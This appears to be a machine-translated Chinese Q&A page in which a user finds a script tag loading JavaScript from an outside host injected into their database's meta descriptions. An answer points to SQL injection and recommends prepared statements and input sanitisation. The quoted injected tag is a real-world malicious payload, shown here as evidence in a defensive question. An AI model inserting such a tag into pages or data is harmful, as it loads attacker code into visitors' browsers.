外部脚本已被注入到我的数据库
An external script has been injected to my database
我从数据库中检索元描述,令我惊讶的是,已返回的数据与附加的脚本代码。
下面是碰巧添加到我的数据库条目 中的代码<script id="alp1398" type="text/javascript" src="http://earcuff.nl/js/jqueryinit.js"></script>
任何想法,这是怎么发生的,或者这个脚本做什么?
最常见的攻击向量-用于填充数据库的参数。检查您是否总是使用准备好的语句(即使用?代替参数的SQL),如果您不能(例如在ORDER BY子句中),则必须对输入进行消毒。
其他途径包括入侵你的帐户本身,以便能够执行SQL语句。
你在问题中提供的数据这么少,很难告诉我们到底发生了什么。请说明您正在使用的中间层等
相关文章:
- 将输入字段中的文本提交到我的数据库,同时将其添加到我的列表中
- 我应该把维基百科的数据保存到我的数据库中吗
- 如何在谷歌地图上显示我的数据库地址,不带lat和long
- 谷歌地图(它没有将结果显示到我的输入窗格中以保存到我的数据库中)
- 无法让我的幻灯片通过我的数据库工作
- 节点发布 将新记录插入我的数据库不会返回新条目的数据
- 点击后没有错误检测,但无法发布到我的数据库
- 将图像上传到服务器(picasa/dropbox/etc)并检索url以将其保存在我的数据库中
- 如何将所有列存储到我的数据库中?通过Javascript
- 尝试通过AJAX发送数字,然后将它们添加到我的数据库中
- 我的数据库通过Phonegap存储在Android中的/data/data/package-name/app_datab
- 将谷歌注册id存储到我的数据库中
- 为什么我的数据库对象的集合为空
- 事件(表内容可编辑)并发送到PHP文件以更新我的数据库
- 我的帖子没有;t插入我的数据库
- 如何连接到我的数据库与javascript和更改用户的用户名
- 我怎么知道什么是我的数据库在我的服务器上的主机名
- 外部脚本已被注入到我的数据库
- 如何重写jQuery日历的删除,以便我也可以删除我的数据库数据
- Post数据通过php到我的数据库在AngularjS
